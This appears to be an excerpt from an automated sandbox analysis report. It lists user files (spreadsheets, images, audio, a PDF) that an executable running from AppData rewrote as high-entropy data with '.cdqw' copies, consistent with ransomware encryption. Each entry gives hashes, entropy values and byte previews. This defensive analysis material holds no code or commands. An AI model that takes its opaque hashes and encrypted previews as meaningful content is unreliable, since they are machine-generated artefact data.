                                                                                                                                                  Preview:MQAWX..T..!b.....c...fmm....qk.....|.G`k..[.MBR.V. .......e.....T9q.....L.\.....'"...EV3...|....y.Z9..-..B6..j.....0VD.u.;.. .......mM.<.0]u..#Nz..%...r]..j..Z.(.1.W:..F.6tJ.a....vj.2T.7......K..<.$...#R...3.._B!A.!.G...{......QtK3.w..<..p.....:dV2...?$....y..M..j...e44.B.S[..|..4C)(...=Rg...zrI.....0.".n-~.lI.;.).....%.xgr<.../Y.z..x..~O.E.J.>O..:.t...n..M?..q9..t.Og...`.7.5....J...;-..\..r....s.\8. ..U[.h*&h..OQ..._....NF.....([%.A9...M'..)E....FL..C.hF.;`.....8%y2..o..V.].}W;..Z8...Q....w...2..nD.o.....T.k/.IL So+....@..$$..l....].H.,n;.`.......~.Y&.j.).0..z.|...kE...hs.>..f."....b..|...L.{...A.(....K.H.Z.Q..2.;........A...up...eu...8e..".ha.%0.._.V..x...Q..N.z].X_..()...&|JV...N..8XP..}f..d<~.)....T.N.>=c.<e.?...........w...D.t.@18.Q_.%..m...h.]......#E.7.N..k5.......]J?i.@pz.....V.fD....c.}.."#..|TQ....%Yb;.....md.L~.....WC.y...j.......(...A5.s.H..;d.q.N@.C.hj..8....zh..g{%..a...4.0k...!.."+.PZ...M..XrHS..X..p....y...Q......>.x.DP.

                                                                                                                                                  C:\Users\user\Desktop\MQAWXUYAIK.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.873478664444721
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:khDqJYYiyhxSUvCw/9TZ0JIt30V0CVVvxkTQVhB2bD:jiYxnKw/lZyIt30V0avxiWaD
                                                                                                                                                  MD5:70556DECA636970929534A5D8159551F
                                                                                                                                                  SHA1:802CB84A7CC3EA26596EDECFFAA231C0607BC87A
                                                                                                                                                  SHA-256:29E0FB7D3BDBB870D0F9FC930D7B845F5D9EFBF0BD5A2C0949A25E307219B272
                                                                                                                                                  SHA-512:6587D8C7F177585EDF09DBA33F0CE2BDB55FA0473D2581701E1B5760669BE9E3EB42857E156E3D3E39CADAB7B6EDDF1A3F581C3EB64D1AC8EB231763A4E61C32
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX..T..!b.....c...fmm....qk.....|.G`k..[.MBR.V. .......e.....T9q.....L.\.....'"...EV3...|....y.Z9..-..B6..j.....0VD.u.;.. .......mM.<.0]u..#Nz..%...r]..j..Z.(.1.W:..F.6tJ.a....vj.2T.7......K..<.$...#R...3.._B!A.!.G...{......QtK3.w..<..p.....:dV2...?$....y..M..j...e44.B.S[..|..4C)(...=Rg...zrI.....0.".n-~.lI.;.).....%.xgr<.../Y.z..x..~O.E.J.>O..:.t...n..M?..q9..t.Og...`.7.5....J...;-..\..r....s.\8. ..U[.h*&h..OQ..._....NF.....([%.A9...M'..)E....FL..C.hF.;`.....8%y2..o..V.].}W;..Z8...Q....w...2..nD.o.....T.k/.IL So+....@..$$..l....].H.,n;.`.......~.Y&.j.).0..z.|...kE...hs.>..f."....b..|...L.{...A.(....K.H.Z.Q..2.;........A...up...eu...8e..".ha.%0.._.V..x...Q..N.z].X_..()...&|JV...N..8XP..}f..d<~.)....T.N.>=c.<e.?...........w...D.t.@18.Q_.%..m...h.]......#E.7.N..k5.......]J?i.@pz.....V.fD....c.}.."#..|TQ....%Yb;.....md.L~.....WC.y...j.......(...A5.s.H..;d.q.N@.C.hj..8....zh..g{%..a...4.0k...!.."+.PZ...M..XrHS..X..p....y...Q......>.x.DP.

                                                                                                                                                  C:\Users\user\Desktop\ONBQCLYSPU.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8718635685938505
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pvWPL30cEnyJdIgu8Hj2zoqpOnp5bPZq1DK/oRrMvqjAGSmZw2bD:9WPLEcEOdIGFqpA5kaoBufmD
                                                                                                                                                  MD5:FBCA2F88D464443FC8645293EEFACDD0
                                                                                                                                                  SHA1:E9BA357C1C61B04EE7269CC9E3C2CCA80F40EEE1
                                                                                                                                                  SHA-256:845E4E5442EC44EB78CC684BD5AA7DAD096DF5EE2BFFC64F240217049A373881
                                                                                                                                                  SHA-512:E31CD3C8A2CD5837481145BE9ACF1BA1AA9F1EB44F6B4D419C74606F2120278961161158BCA3C5B9B9FDED83F2160B04541CEE00D0763F2A7900AB36F8468D34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC2q.i/d..j....j......C.A......>.r.^K.f.....u..l.....{H\.,?1...a...f...M.$.s.........^..'...8...A.....r.?.v"....H.1...-W.O..K.......m..6.q.86..{...E&k.B....):...;..9!....@L }......=5...X..[...%.}q.w....{.W.....yB.._..P.m.....Fg'........w..N...Y.ZL?!.~....h....|z..1....Sc.[X..w`.E...#&.....iu+.I,...O...q......pp.....-.P)|.e....3.E.....x4.@.;...p.Ap9.)......lP.s..:A%.k.P}..e..0....7f>{n=..G.x.l.y69...oz.a.h.G?6..r.#.<...Y.F@b.......h..J..F).....(..G..)8f..}..g....h.....=..A...x.R.V&..QJ..;;z..m..e...\.s.)..t..+.q..6.RpaM9,.....ay<.a..>L..a$...Q.V.g..%.D...w...~(0.g...........".t....H.Uu^....m.1{2E.eP..rts..9...."..d(7../.._d....u.....#..\..\....F.Nv.|.."NG..j.Q.i..Y.b!..ML..0.'V....5.(..\..o..?.Y.CtFT.....j>.y...'.Up.....yW...T..H.;....t..-zH.O.......?...(.\....;R.z...G.. ..k..3d..;.h...^..v..aB.!...)+f..>D.... .+tRD4t.m.D..}..s)f.^...`..Y...v...>{...S.#....@..z.#..u.>./).y.A.....b...W".N..rp.>...V.....4Y...R..6.8.0.......5...

                                                                                                                                                  C:\Users\user\Desktop\ONBQCLYSPU.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8718635685938505
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pvWPL30cEnyJdIgu8Hj2zoqpOnp5bPZq1DK/oRrMvqjAGSmZw2bD:9WPLEcEOdIGFqpA5kaoBufmD
                                                                                                                                                  MD5:FBCA2F88D464443FC8645293EEFACDD0
                                                                                                                                                  SHA1:E9BA357C1C61B04EE7269CC9E3C2CCA80F40EEE1
                                                                                                                                                  SHA-256:845E4E5442EC44EB78CC684BD5AA7DAD096DF5EE2BFFC64F240217049A373881
                                                                                                                                                  SHA-512:E31CD3C8A2CD5837481145BE9ACF1BA1AA9F1EB44F6B4D419C74606F2120278961161158BCA3C5B9B9FDED83F2160B04541CEE00D0763F2A7900AB36F8468D34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC2q.i/d..j....j......C.A......>.r.^K.f.....u..l.....{H\.,?1...a...f...M.$.s.........^..'...8...A.....r.?.v"....H.1...-W.O..K.......m..6.q.86..{...E&k.B....):...;..9!....@L }......=5...X..[...%.}q.w....{.W.....yB.._..P.m.....Fg'........w..N...Y.ZL?!.~....h....|z..1....Sc.[X..w`.E...#&.....iu+.I,...O...q......pp.....-.P)|.e....3.E.....x4.@.;...p.Ap9.)......lP.s..:A%.k.P}..e..0....7f>{n=..G.x.l.y69...oz.a.h.G?6..r.#.<...Y.F@b.......h..J..F).....(..G..)8f..}..g....h.....=..A...x.R.V&..QJ..;;z..m..e...\.s.)..t..+.q..6.RpaM9,.....ay<.a..>L..a$...Q.V.g..%.D...w...~(0.g...........".t....H.Uu^....m.1{2E.eP..rts..9...."..d(7../.._d....u.....#..\..\....F.Nv.|.."NG..j.Q.i..Y.b!..ML..0.'V....5.(..\..o..?.Y.CtFT.....j>.y...'.Up.....yW...T..H.;....t..-zH.O.......?...(.\....;R.z...G.. ..k..3d..;.h...^..v..aB.!...)+f..>D.... .+tRD4t.m.D..}..s)f.^...`..Y...v...>{...S.#....@..z.#..u.>./).y.A.....b...W".N..rp.>...V.....4Y...R..6.8.0.......5...

                                                                                                                                                  C:\Users\user\Desktop\PSAMNLJHZW.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:PSA archive data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.845896839939342
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:nULj/RuiMz1PnbvvDPUUgM+tHDmAo6jTleHlxDp3GeLBMq0ggB/n+c2bD:nSj8ZPbv7SM+tPo6jTMVk+vD
                                                                                                                                                  MD5:6E4A9D2A53222829966C1572C36CB8D9
                                                                                                                                                  SHA1:F5B2F4761E988408BE2B7CAEAE43D6F9754650D9
                                                                                                                                                  SHA-256:7D55425D4A05515F0CF882C3E9CAA78143182CD0EFB3A8D0DED00E6E682EF21F
                                                                                                                                                  SHA-512:EE6FC858637D038418401C2E56D77F69F58803C6FF2853B7B385A65269F68D2BC65118D154D2C03EACCB3B24CCD75F2C269F4A4144B9C312083AD687D9B4EE34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSAMN...5...L*.r.&<uC....(....nL.}N!...c..a..P.tm=A... ...F.Y.D....f<...&.R$.R8;.Y.WJ.'F....{P.}QP=k..p......K.c88J1.....K.....%)...:.L2.....VHJ......Zl{.x..P$,X..j..c...A..N.}.:8..lL[!..Cf.....c^#.k...........U`.....v..M...]|.E.zR.?..8........2*.}o5OhgB.Q8".1..g....E..<..T.m.:/.).&.y.,..."...A#Q...O...,........9.+.e~...2.=,.......4sZn|.j*..FFd.....E.l.Q.}.&...$Jk.......x.G.F...G......`Y.>. ...-......4...D(s....o.>.....M._...I..6....TP.....E=.w.n.Y..>P...@...L..0I.8Jv..Y....H...]>'..\s.qU.:q'BU...Z...@...*.,....kSt.rp.M.c.H....)..35....rF..h.....t.....l..... ..X.t..e...`.DJ*.Q....j..D...v....oW...!7...g;/......$...M....G.&...Y....&.j...[.i}.v.M`.?...........h..^....7..).{fj..q....~......].YM.!..#k.yCl.H2x..)..y"..y....<G.o#.....N..[X..!8........4.h.q.wv1.\?.@..D.L.k.6......ba./...m..1\.........v...tV.,01.1W.3.kI..m..F..2U.6.U.3..2G.....3.tuO.u...(.#...4....._.(c........8y.5..z)..Y..D.%.8D`X.S..w..q....V.?6A.<,...I.Z."..L...9...Iw~..g.F:..k*<

                                                                                                                                                  C:\Users\user\Desktop\PSAMNLJHZW.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:PSA archive data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.845896839939342
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:nULj/RuiMz1PnbvvDPUUgM+tHDmAo6jTleHlxDp3GeLBMq0ggB/n+c2bD:nSj8ZPbv7SM+tPo6jTMVk+vD
                                                                                                                                                  MD5:6E4A9D2A53222829966C1572C36CB8D9
                                                                                                                                                  SHA1:F5B2F4761E988408BE2B7CAEAE43D6F9754650D9
                                                                                                                                                  SHA-256:7D55425D4A05515F0CF882C3E9CAA78143182CD0EFB3A8D0DED00E6E682EF21F
                                                                                                                                                  SHA-512:EE6FC858637D038418401C2E56D77F69F58803C6FF2853B7B385A65269F68D2BC65118D154D2C03EACCB3B24CCD75F2C269F4A4144B9C312083AD687D9B4EE34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSAMN...5...L*.r.&<uC....(....nL.}N!...c..a..P.tm=A... ...F.Y.D....f<...&.R$.R8;.Y.WJ.'F....{P.}QP=k..p......K.c88J1.....K.....%)...:.L2.....VHJ......Zl{.x..P$,X..j..c...A..N.}.:8..lL[!..Cf.....c^#.k...........U`.....v..M...]|.E.zR.?..8........2*.}o5OhgB.Q8".1..g....E..<..T.m.:/.).&.y.,..."...A#Q...O...,........9.+.e~...2.=,.......4sZn|.j*..FFd.....E.l.Q.}.&...$Jk.......x.G.F...G......`Y.>. ...-......4...D(s....o.>.....M._...I..6....TP.....E=.w.n.Y..>P...@...L..0I.8Jv..Y....H...]>'..\s.qU.:q'BU...Z...@...*.,....kSt.rp.M.c.H....)..35....rF..h.....t.....l..... ..X.t..e...`.DJ*.Q....j..D...v....oW...!7...g;/......$...M....G.&...Y....&.j...[.i}.v.M`.?...........h..^....7..).{fj..q....~......].YM.!..#k.yCl.H2x..)..y"..y....<G.o#.....N..[X..!8........4.h.q.wv1.\?.@..D.L.k.6......ba./...m..1\.........v...tV.,01.1W.3.kI..m..F..2U.6.U.3..2G.....3.tuO.u...(.#...4....._.(c........8y.5..z)..Y..D.%.8D`X.S..w..q....V.?6A.<,...I.Z."..L...9...Iw~..g.F:..k*<

                                                                                                                                                  C:\Users\user\Desktop\QVTVNIBKSD.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.844654221323937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1f7FuvMJ0K0j5TxgeceX+legJc86NMC1zgn9LiFNnkKHoGlHm52bD:1f7FuEFSRceXqJczb0yNxZXD
                                                                                                                                                  MD5:475D6FE91D6E088706B5125183B0B566
                                                                                                                                                  SHA1:80E110A35B1EF9175E05DC78748B6C1DB3A5B5C9
                                                                                                                                                  SHA-256:442B438BA59B1AFB5FA93AB0E9C651DF8CFE144597BCBE75AAA8C152F2E73E6A
                                                                                                                                                  SHA-512:792BE2D616F51A521EACE59DDC52D17CC2B51A3CBCB8296277642D321AB95A2497DD20ECC074015271284507C4ECB0CD0C8B81EEFEC9B2CB13D110A7BC2DD032
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVNL....K.-\..o.r.R|..#...^.....>._y..a.w.G..Kw.O.`=.E..>..44.P~...0f....p%.6.!.h.|mmu.y..S.AF..8......I#R.X.H..@...T...6.D]E.Y....X...7.c.<t.:wI.?E.k..<{M..ae.^&9.1.A......L.0.j..T.C:..H... ..eK...n8%d.].S|8...../....5 r..?.\A.6{8.......~)xO..\h%N....4...'H.Ng......N.WB.d.&f...mwrPq2.....Y..9.]>{..Ry.o.,I...N....v.;C-1....2s[...^e....2P..e...P..R.....-D.%...K...*D..9..k_x>...+...z.p...G*...~..`..T.....}!.3.....4...].^q.]5!b.{.)>`.ax...z+3@^..&.y....PZcqY..)d,.D......?..'..<...Ej".~L...P.c.JK.N..#..<|H..n.y.b<<:..Xd.~t=X`.e....Y+..R.7......%...4?T...(P.G'.....d......2.Q..h.......LJ../.......?e..msa...0.8.oq!....l.{..v..QY;./A..8K....A..|.6k.$f...y&a..$.Z........"...\>A.'.#..2f....2.....".^.]..!..jz..w.<......Nc.....NS..I..........Z'/[a"..Y.I.I..?z.Lt.ak....b)bJ.t......:.#gV..../..[u5etX.....Z.t..L.U.x*K...S.....W..~...`;1(Q7..A..Q...T.....G.........s.R.|..d.|.j1Y....[.[....u........#.....:7...)9V.7.y.*.....ZA........<....O.(...

                                                                                                                                                  C:\Users\user\Desktop\QVTVNIBKSD.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.844654221323937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1f7FuvMJ0K0j5TxgeceX+legJc86NMC1zgn9LiFNnkKHoGlHm52bD:1f7FuEFSRceXqJczb0yNxZXD
                                                                                                                                                  MD5:475D6FE91D6E088706B5125183B0B566
                                                                                                                                                  SHA1:80E110A35B1EF9175E05DC78748B6C1DB3A5B5C9
                                                                                                                                                  SHA-256:442B438BA59B1AFB5FA93AB0E9C651DF8CFE144597BCBE75AAA8C152F2E73E6A
                                                                                                                                                  SHA-512:792BE2D616F51A521EACE59DDC52D17CC2B51A3CBCB8296277642D321AB95A2497DD20ECC074015271284507C4ECB0CD0C8B81EEFEC9B2CB13D110A7BC2DD032
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVNL....K.-\..o.r.R|..#...^.....>._y..a.w.G..Kw.O.`=.E..>..44.P~...0f....p%.6.!.h.|mmu.y..S.AF..8......I#R.X.H..@...T...6.D]E.Y....X...7.c.<t.:wI.?E.k..<{M..ae.^&9.1.A......L.0.j..T.C:..H... ..eK...n8%d.].S|8...../....5 r..?.\A.6{8.......~)xO..\h%N....4...'H.Ng......N.WB.d.&f...mwrPq2.....Y..9.]>{..Ry.o.,I...N....v.;C-1....2s[...^e....2P..e...P..R.....-D.%...K...*D..9..k_x>...+...z.p...G*...~..`..T.....}!.3.....4...].^q.]5!b.{.)>`.ax...z+3@^..&.y....PZcqY..)d,.D......?..'..<...Ej".~L...P.c.JK.N..#..<|H..n.y.b<<:..Xd.~t=X`.e....Y+..R.7......%...4?T...(P.G'.....d......2.Q..h.......LJ../.......?e..msa...0.8.oq!....l.{..v..QY;./A..8K....A..|.6k.$f...y&a..$.Z........"...\>A.'.#..2f....2.....".^.]..!..jz..w.<......Nc.....NS..I..........Z'/[a"..Y.I.I..?z.Lt.ak....b)bJ.t......:.#gV..../..[u5etX.....Z.t..L.U.x*K...S.....W..~...`;1(Q7..A..Q...T.....G.........s.R.|..d.|.j1Y....[.[....u........#.....:7...)9V.7.y.*.....ZA........<....O.(...

                                                                                                                                                  C:\Users\user\Desktop\QVTVNIBKSD.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.847777104911423
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SRSb8u9wmzHRX1r+aNMDskUCb9bykQ9Hi/RnI3ZctFH/QHW+Jbe+zQu72bD:SRSb8uWmLz+WJENdQ2G2txIHW+JbID
                                                                                                                                                  MD5:3EDAE23DAE59CF1C6705E3CBDA4169E8
                                                                                                                                                  SHA1:BBB801284601785DF3C7D3A8CF0D0BD48FFE8B1A
                                                                                                                                                  SHA-256:7AF92019A09A35D934B55680479C9C5905CD386D06B10D913694FE3554E7306A
                                                                                                                                                  SHA-512:72F772CD8D53BCFB5C95BBEFC54E7EAE6495719ECAF5E27A93E2D21C2501CA976B32A8C040213605823058F6B9D8A67A19872B9D02FA6D4AA8B19404669983FA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN!'...y...h..S..u8.'.D.....^g_....l.h>V...u...N.X......!4...EK......4.;8>...g:...KYu.gEf.&..-..jq.p.cf?...[..B."$....B..`.db.......8p"..L.".5mJfj.~."....L...e.w.>..S;.Mg.{"..y.G....H=E.........._...?f,w.J..|.F"....$..T,.%<#.B?.z5\.j...y..:..;.._..D.iA.; ..o.........e..O..PA.!E...>.......&..{...E*..Wd.C?./.@J,..+w...A.h....,...lX..o.U..+.3.....lJC}...YX..$c9B.......G......5...,.<..*.....n...H.3..C.<.5..p..G.q..8`.....9....6.r.....9.7.`~.....S.....=.qq...N....G.id..RF[....>....J.Uo...Q*g.........s..@...~.r.q.X.......Z..%..u.Q...+5gd.m.9.......s2.!b.jY.oW..Hsp.2...:..RT....]'8.?u.Sz..."......;..,.k.=.x..Z...?.X......Lxa..30.v.B.H.t3t..n..K.v......I..g."..h....0.}....9'.e.g.:l..~....i.Ew...T.=.o.hx.dc..*F....e^"5|N.z..DB_@T.....]8.4...+)..q.W.[...[7.9..h.U.T.........W.@...:.3...I. ..E.u43..mt.&.>.q..#]..M.Qm=C.W..<..?.._..Go2.....Y0.A.........=..V..E..~.3...O.1...tG)..F.53?p...q.u.j.z .M.q.......g..|...[}[h....i^.....'t.c..2......m._.....

                                                                                                                                                  C:\Users\user\Desktop\QVTVNIBKSD.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.847777104911423
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SRSb8u9wmzHRX1r+aNMDskUCb9bykQ9Hi/RnI3ZctFH/QHW+Jbe+zQu72bD:SRSb8uWmLz+WJENdQ2G2txIHW+JbID
                                                                                                                                                  MD5:3EDAE23DAE59CF1C6705E3CBDA4169E8
                                                                                                                                                  SHA1:BBB801284601785DF3C7D3A8CF0D0BD48FFE8B1A
                                                                                                                                                  SHA-256:7AF92019A09A35D934B55680479C9C5905CD386D06B10D913694FE3554E7306A
                                                                                                                                                  SHA-512:72F772CD8D53BCFB5C95BBEFC54E7EAE6495719ECAF5E27A93E2D21C2501CA976B32A8C040213605823058F6B9D8A67A19872B9D02FA6D4AA8B19404669983FA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN!'...y...h..S..u8.'.D.....^g_....l.h>V...u...N.X......!4...EK......4.;8>...g:...KYu.gEf.&..-..jq.p.cf?...[..B."$....B..`.db.......8p"..L.".5mJfj.~."....L...e.w.>..S;.Mg.{"..y.G....H=E.........._...?f,w.J..|.F"....$..T,.%<#.B?.z5\.j...y..:..;.._..D.iA.; ..o.........e..O..PA.!E...>.......&..{...E*..Wd.C?./.@J,..+w...A.h....,...lX..o.U..+.3.....lJC}...YX..$c9B.......G......5...,.<..*.....n...H.3..C.<.5..p..G.q..8`.....9....6.r.....9.7.`~.....S.....=.qq...N....G.id..RF[....>....J.Uo...Q*g.........s..@...~.r.q.X.......Z..%..u.Q...+5gd.m.9.......s2.!b.jY.oW..Hsp.2...:..RT....]'8.?u.Sz..."......;..,.k.=.x..Z...?.X......Lxa..30.v.B.H.t3t..n..K.v......I..g."..h....0.}....9'.e.g.:l..~....i.Ew...T.=.o.hx.dc..*F....e^"5|N.z..DB_@T.....]8.4...+)..q.W.[...[7.9..h.U.T.........W.@...:.3...I. ..E.u43..mt.&.>.q..#]..M.Qm=C.W..<..?.._..Go2.....Y0.A.........=..V..E..~.3...O.1...tG)..F.53?p...q.u.j.z .M.q.......g..|...[}[h....i^.....'t.c..2......m._.....

                                                                                                                                                  C:\Users\user\Desktop\TQDGENUHWP.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.829655996997484
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PPGSb+BKmLNZcceYVm470hvbDWU0FY/NGda/Nal7k1pjKl4hRo9rdne2bD:PPGSWKy6ceVbNnQIg7apj2hJFD
                                                                                                                                                  MD5:F066EEE566C98CFC8383CF21B1F5E29E
                                                                                                                                                  SHA1:7213522007BC7435490E5F78E61C0E1CBA04DD0C
                                                                                                                                                  SHA-256:DC6C6B7785148B52E96552F1367C6365D4B8E44D5D8A5A41F63C4D9510563383
                                                                                                                                                  SHA-512:475DAB3A9C72CDC52221C443386473618C13FF105F5082BAC44687A4E9E5CF696BF0B6B36FFCE17EBF363A2474E2E022EDCEDB6B4BC309E3A7ABA636E90BE5F1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE#,..p(.\f...K.VV..G.m..7oB.d....W...a.....:.3.)...cH..G....F6[:....7mS.K.d./.wR7#.7....t.]...O-K.(&......c...Bd..l.k..z...i.....1a#Q....f.... .w...QAd._..Y%.k.....dp...1t..g...J.@.Z!m.Tj..[.dU..0...._M.7'..2......Q.`#.'..SG.~\.auR. >.9z.1..,D....-...)...B...i....X".....v.!.f...._r..@.@...l..=B.:LeQB.6g""Uh.........8.2..).......K.{..]...(v=.0...r.t...$H.......#...EB!.D...H..8H...XYd.c....{.?.L.[....\.V..jN..|..3.@.HI.._i.Vqh...}<.9....,I.}$..q........s<.VA.0$+E.......*Ca=../y.o.B....v._....s.?.Nt2..%{k.._.P...P..O..M.D....8..&..g.'.cbf.W.@....u....-...6.Jz7..!.L.(.,...8..z8^....Z. ....wHd..Z/.*..D..t...'9.=+.F.Cm..;N.; ..xi}....w..%G...5......7A..g..EK.K*......~9...Z.I..W....1.i.}.h.L.P(..@1. }.40..Yc.AF.}.D.D...c.'[.Ki.FL...?...."........V-./Qs....@..u.P..N..Y....D.....I..HX.m.........B......L..K...Lt#K~g"1.._.d....t4..3]O.W.[].G.....n..-W...W.....ZR.).q5.d.J0.....Q.{%.....v... T...L.f......8....P.;jF.A}d./.(...9......Xe.N}

                                                                                                                                                  C:\Users\user\Desktop\TQDGENUHWP.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.829655996997484
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PPGSb+BKmLNZcceYVm470hvbDWU0FY/NGda/Nal7k1pjKl4hRo9rdne2bD:PPGSWKy6ceVbNnQIg7apj2hJFD
                                                                                                                                                  MD5:F066EEE566C98CFC8383CF21B1F5E29E
                                                                                                                                                  SHA1:7213522007BC7435490E5F78E61C0E1CBA04DD0C
                                                                                                                                                  SHA-256:DC6C6B7785148B52E96552F1367C6365D4B8E44D5D8A5A41F63C4D9510563383
                                                                                                                                                  SHA-512:475DAB3A9C72CDC52221C443386473618C13FF105F5082BAC44687A4E9E5CF696BF0B6B36FFCE17EBF363A2474E2E022EDCEDB6B4BC309E3A7ABA636E90BE5F1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE#,..p(.\f...K.VV..G.m..7oB.d....W...a.....:.3.)...cH..G....F6[:....7mS.K.d./.wR7#.7....t.]...O-K.(&......c...Bd..l.k..z...i.....1a#Q....f.... .w...QAd._..Y%.k.....dp...1t..g...J.@.Z!m.Tj..[.dU..0...._M.7'..2......Q.`#.'..SG.~\.auR. >.9z.1..,D....-...)...B...i....X".....v.!.f...._r..@.@...l..=B.:LeQB.6g""Uh.........8.2..).......K.{..]...(v=.0...r.t...$H.......#...EB!.D...H..8H...XYd.c....{.?.L.[....\.V..jN..|..3.@.HI.._i.Vqh...}<.9....,I.}$..q........s<.VA.0$+E.......*Ca=../y.o.B....v._....s.?.Nt2..%{k.._.P...P..O..M.D....8..&..g.'.cbf.W.@....u....-...6.Jz7..!.L.(.,...8..z8^....Z. ....wHd..Z/.*..D..t...'9.=+.F.Cm..;N.; ..xi}....w..%G...5......7A..g..EK.K*......~9...Z.I..W....1.i.}.h.L.P(..@1. }.40..Yc.AF.}.D.D...c.'[.Ki.FL...?...."........V-./Qs....@..u.P..N..Y....D.....I..HX.m.........B......L..K...Lt#K~g"1.._.d....t4..3]O.W.[].G.....n..-W...W.....ZR.).q5.d.J0.....Q.{%.....v... T...L.f......8....P.;jF.A}d./.(...9......Xe.N}

                                                                                                                                                  C:\Users\user\Desktop\TQDGENUHWP.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.859818948835278
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AzOXrWhPjPFiGaCv9vRXq08W06Km8RdwOW5zhp2PINaXNVeXH12bD:AYrEBcEhqVVY8RdwOUzhp2PjdIXuD
                                                                                                                                                  MD5:CD30667FEF7F999D67F5AB5D974395B1
                                                                                                                                                  SHA1:62E72B35CE01620405617C87ECCA1F23C9B47FAE
                                                                                                                                                  SHA-256:21AD3552FC9066F25B4AA5185F71B6CED5C8D29371BA8F4CA16ED956CFB39D88
                                                                                                                                                  SHA-512:332E4009C61CDD0D7D47ABD991E00490155358554ECFF96BA6D008FB46490CFD0765D02611FBFB3D1670D6CEEEDE22A392E024B65134CA9683EAE8CBA7FA5057
                                                                                                                                                  Malicious:false
